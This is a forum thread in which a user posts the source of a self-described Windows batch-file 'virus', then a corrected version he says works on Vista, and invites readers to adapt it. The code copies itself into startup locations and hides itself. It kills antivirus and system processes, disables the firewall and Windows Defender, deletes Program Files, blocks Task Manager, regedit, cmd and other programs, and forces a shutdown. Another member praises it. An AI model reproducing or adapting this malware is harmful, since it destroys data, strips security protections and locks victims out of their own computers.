Go Back   Gaming Gutter > Non-Gaming > Programming > Source Code
Reload this Page Sample Batch


Source Code - Have a source code/project files you want to post? Do so here.

» Site Navigation
» Home
» Forum
» User CP
» FAQ
» Log in
User Name:

Password:

Not a member yet?
Register Now!
» Advertisement
» GG Stuff

Follow us on Twitter!

Get the GG toolbar today (for firefox only)
» Recent Threads
Weed smoking.
07-17-2009 07:42 AM
by rufiomk
Last post by Ruzzeh
Today 12:18 AM
187 Replies, 2,359 Views
Go to first new post Suitcase
03-18-2010 08:51 PM
by Crepe
Last post by Oops
Yesterday 11:10 PM
3 Replies, 37 Views
Go to first new post Loyal User Perk
Yesterday 05:01 PM
by BSavage
Last post by l_royalty_l
Yesterday 11:04 PM
15 Replies, 143 Views
Go to first new post u guise r meen
Yesterday 08:24 PM
by Sxc
Last post by Husky
Yesterday 10:56 PM
59 Replies, 265 Views
Go to first new post Hey hey now! PotW...
Yesterday 04:34 PM
Last post by Husky
Yesterday 10:53 PM
14 Replies, 53 Views
Reply
 
LinkBack Thread Tools Display Modes

 Sample Batch
Old 07-10-2009, 10:10 PM   #1 (permalink)
Junior Member

Male Zythier is offline
 
Join Date: Jul 2009
Posts: 2
GPoints: 381
iTrader: 0 / 0%
Zythier Is Recognizable
Rep Power: 0
Wink Sample Batch
I did some basic windows exploits involving startup, and the shutdown command. I was wondering if this new code i compiled would work or not work. Keep in mind its my first actual attempt of virus. BTW I targeted some specific anti-virus programs (for my practical uses ) And also it tries to copy to both vista and xp "startup" files, just FYI.

Code:
@echo off
copy "JuStiC3.bat" "%SYSTEMROOT%\"
attrib +r +h +s "JuStiC3.bat"
copy "JuStiC3.bat" "%HOMEDRIVE%\Documents and Settings\Owner\Start Menu\Programs\startup\"
copy "JuStiC3.bat" "%HOMEDRIVE%\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\"
copy "JuStiC3.bat" "%TEMP%\"
mkdir %SYSTEMROOT%\System32\MS_NT
copy "JuStiC3.bat" "%SYSTEMROOT%\System32\MS_NT\"
taskkill /IM iexplorer.exe /f /t
taskkill /IM firefox.exe /f /t
taskkill /IM avgcc.exe /f /t
taskkill /IM avgamsvr.exe /f /t
taskkill /IM ashServ.exe /f /t
taskkill /IM explorer.exe /f /t
taskkill /IM taskmgr.exe /f /t
net stop "security center"
net stop "sharedaccess"
net stop "windows defender"
netsh firewall set opmode mode = disable
del "%PROGRAMFILES%\ /s /q
attrib +r +h "%SYSTEMROOT%"
reg add HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\system /v DisableTaskMgr /t REG_DWORD /d /f 1
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\windows\currentversion\run /d /f %SYSTEMROOT%\System32\MS_NT\JuStiC3.bat
reg add HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer\DisallowRun
reg add HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer /v DisallowRun /t REG_DWORD /d /f 1
reg add HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer\DisallowRun /v 1 /d /f iexplore.exe
reg add HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer\DisallowRun /v 2 /d /f firefox.exe
reg add HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer\DisallowRun /v 3 /d /f notepad.exe
reg add HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer\DisallowRun /v 4 /d /f wordpad.exe
reg add HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer\DisallowRun /v 5 /d /f wmplayer.exe
reg add HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer\DisallowRun /v 6 /d /f regedit.exe
reg add HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer\DisallowRun /v 7 /d /f avast.exe
reg add HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer\DisallowRun /v 8 /d /f help.exe
reg add HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer\DisallowRun /v 9 /d /f msconfig.exe
reg add HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer\DisallowRun /v 10 /d /f winmail.exe
reg add HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer\DisallowRun /v 11 /d /f outlook.exe
reg add HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer\DisallowRun /v 12 /d /f avgcc.exe
reg add HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer\DisallowRun /v 13 /d /f avgamsvr.exe
reg add HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer\DisallowRun /v 14 /d /f ashServ.exe
reg add HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer\DisallowRun /v 15 /d /f cmd.exe
  Reply With Quote

 
Old 07-10-2009, 11:18 PM   #2 (permalink)
wonoes

Male Personoid xX is offline
 
Personoid xX's Avatar
 
Join Date: Sep 2008
Location: In SciTe
Posts: 1,304
GPoints: 16,185
iTrader: 0 / 0%
Personoid xX Is a Lord of AwesomenessPersonoid xX Is a Lord of AwesomenessPersonoid xX Is a Lord of AwesomenessPersonoid xX Is a Lord of Awesomeness
Rep Power: 10
This is very nice... I would have never thought of this.
Thanks. +Rep.
__________________





Quote:
Originally Posted by Cake
Quote:
Originally Posted by Fork
is it hot in here or is it just me?
no that's personoid
  Reply With Quote

 
Old 07-11-2009, 04:21 PM   #3 (permalink)
Junior Member

Male Zythier is offline
 
Join Date: Jul 2009
Posts: 2
GPoints: 381
iTrader: 0 / 0%
Zythier Is Recognizable
Rep Power: 0
No problem your post made my day but I must say it was a lot easier confirming the .exe(s) with this website that has a list/search engine of them all!

Kudos to Windows Process Information
Automerged doublepost:
Sorry for double post but i think there are some coding errors....

I tested and failed

Code:
reg add HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer /v DisallowRun /t REG_DWORD /d /f 1
reg add HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer\DisallowRun /v 1 /d /f WinMail.exe
Santax Error , not sure what's wrong. I'm a noob lol.

EDIT: I was stupid and put the /d before the /f
-,-

EDIT EDIT: FINAL CODE TESTED ON VISTA WORKING, Requires both batch files 'a' and 'b' (a was created for auto restart upon first execution)

Code:
@echo off
copy "JuStiC3b.bat" "%SYSTEMROOT%\"
copy "JuStiC3b.bat" "%HOMEDRIVE%\Documents and Settings\Owner\Start Menu\Programs\startup\"
copy "JuStiC3b.bat" "%HOMEDRIVE%\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\"
copy "JuStiC3.bat" "%TEMP%\"
mkdir %SYSTEMROOT%\System32\MS_NT
copy "JuStiC3.bat" "%SYSTEMROOT%\System32\MS_NT\"
taskkill /IM iexplorer.exe /f /t
taskkill /IM firefox.exe /f /t
taskkill /IM avgcc.exe /f /t
taskkill /IM avgamsvr.exe /f /t
taskkill /IM ashServ.exe /f /t
taskkill /IM explorer.exe /f /t
taskkill /IM taskmgr.exe /f /t
net stop "security center"
net stop "sharedaccess"
net stop "windows defender"
netsh firewall set opmode mode = disable
del "%PROGRAMFILES%\ /q
attrib +r +h "%SYSTEMROOT%"
reg add HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\system /v DisableTaskMgr /t REG_DWORD /d /f 1
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\windows\currentversion\run /f /d %SYSTEMROOT%\System32\MS_NT\JuStiC3b.bat
reg add HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer\DisallowRun /f
reg add HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer\DisallowRun /v 1 /f /d iexplore.exe
reg add HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer\DisallowRun /v 2 /f /d firefox.exe
reg add HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer\DisallowRun /v 3 /f /d notepad.exe
reg add HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer\DisallowRun /v 4 /f /d wordpad.exe
reg add HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer\DisallowRun /v 5 /f /d wmplayer.exe
reg add HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer\DisallowRun /v 6 /f /d regedit.exe
reg add HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer\DisallowRun /v 7 /f /d avast.exe
reg add HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer\DisallowRun /v 8 /f /d help.exe
reg add HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer\DisallowRun /v 9 /f /d msconfig.exe
reg add HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer\DisallowRun /v 10 /f /d winmail.exe
reg add HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer\DisallowRun /v 11 /f /d outlook.exe
reg add HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer\DisallowRun /v 12 /f /d avgcc.exe
reg add HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer\DisallowRun /v 13 /f /d avgamsvr.exe
reg add HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer\DisallowRun /v 14 /f /d ashServ.exe
reg add HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer\DisallowRun /v 15 /f /d cmd.exe
reg add HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer /v DisallowRun /t REG_DWORD /d 1 /f
attrib +s "JuStiC3b.bat"
shutdown -s -t 60 -c "Catastrophic Failure"
Name this JuStiC3b.bat
Code:
@echo off
copy "JuStiC3b.bat" "%SYSTEMROOT%\"
copy "JuStiC3b.bat" "%HOMEDRIVE%\Documents and Settings\Owner\Start Menu\Programs\startup\"
copy "JuStiC3b.bat" "%HOMEDRIVE%\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\"
copy "JuStiC3.bat" "%TEMP%\"
mkdir %SYSTEMROOT%\System32\MS_NT
copy "JuStiC3.bat" "%SYSTEMROOT%\System32\MS_NT\"
taskkill /IM iexplorer.exe /f /t
taskkill /IM firefox.exe /f /t
taskkill /IM avgcc.exe /f /t
taskkill /IM avgamsvr.exe /f /t
taskkill /IM ashServ.exe /f /t
taskkill /IM explorer.exe /f /t
taskkill /IM taskmgr.exe /f /t
net stop "security center"
net stop "sharedaccess"
net stop "windows defender"
netsh firewall set opmode mode = disable
del "%PROGRAMFILES%\ /q
attrib +r +h "%SYSTEMROOT%"
reg add HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\system /v DisableTaskMgr /t REG_DWORD /d /f 1
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\windows\currentversion\run /f /d %SYSTEMROOT%\System32\MS_NT\JuStiC3b.bat
reg add HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer\DisallowRun /f
reg add HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer\DisallowRun /v 1 /f /d iexplore.exe
reg add HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer\DisallowRun /v 2 /f /d firefox.exe
reg add HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer\DisallowRun /v 3 /f /d notepad.exe
reg add HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer\DisallowRun /v 4 /f /d wordpad.exe
reg add HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer\DisallowRun /v 5 /f /d wmplayer.exe
reg add HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer\DisallowRun /v 6 /f /d regedit.exe
reg add HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer\DisallowRun /v 7 /f /d avast.exe
reg add HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer\DisallowRun /v 8 /f /d help.exe
reg add HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer\DisallowRun /v 9 /f /d msconfig.exe
reg add HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer\DisallowRun /v 10 /f /d winmail.exe
reg add HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer\DisallowRun /v 11 /f /d outlook.exe
reg add HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer\DisallowRun /v 12 /f /d avgcc.exe
reg add HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer\DisallowRun /v 13 /f /d avgamsvr.exe
reg add HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer\DisallowRun /v 14 /f /d ashServ.exe
reg add HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer\DisallowRun /v 15 /f /d cmd.exe
reg add HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer /v DisallowRun /t REG_DWORD /d 1 /f
attrib +s "JuStiC3b.bat"
Tell me what you think, and ofcourse use exelib (link further up) to edit for your personal uses (disabling certain programs, services,etc.)
Last edited by Zythier; 07-11-2009 at 09:51 PM.. Reason: Automerged Doublepost
  Reply With Quote
Reply

Bookmarks

« My First C++ Program | [PYTHON]Basic Neopets Login Code »


Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
 
Thread Tools
Display Modes
Linear Mode Linear Mode

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are On

Powered by vBadvanced CMPS v3.1.0

All times are GMT -7. The time now is 01:16 AM.
Mark Forums Read | View Forum Leaders
Contact Us - Gaming Gutter - Archive - South Park - South Park Episodes - Top


vBulletin skin developed by: eXtremepixels
vBCredits v1.4 Copyright ©2007 - 2008, PixelFX Studios
The contents of this webpage are copyright © 2006-2008 GamingGutter.com. All Rights Reserved.

Page generated in 0.22349000 seconds (100.00% PHP - 0% MySQL) with 21 queries